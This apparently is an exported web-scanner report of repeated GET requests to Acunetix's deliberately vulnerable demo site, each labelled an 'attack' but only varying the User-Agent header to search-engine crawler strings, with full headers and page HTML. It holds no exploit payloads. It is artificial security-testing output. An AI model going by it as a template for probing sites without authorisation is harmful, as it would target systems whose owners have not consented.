Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Evidence
Show / hide Request and Response
Request Header - size: 397 bytes.	GET http://testaspnet.vulnweb.com/ HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:16 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Evidence
Show / hide Request and Response
Request Header - size: 408 bytes.	GET http://testaspnet.vulnweb.com/ HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:16 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" 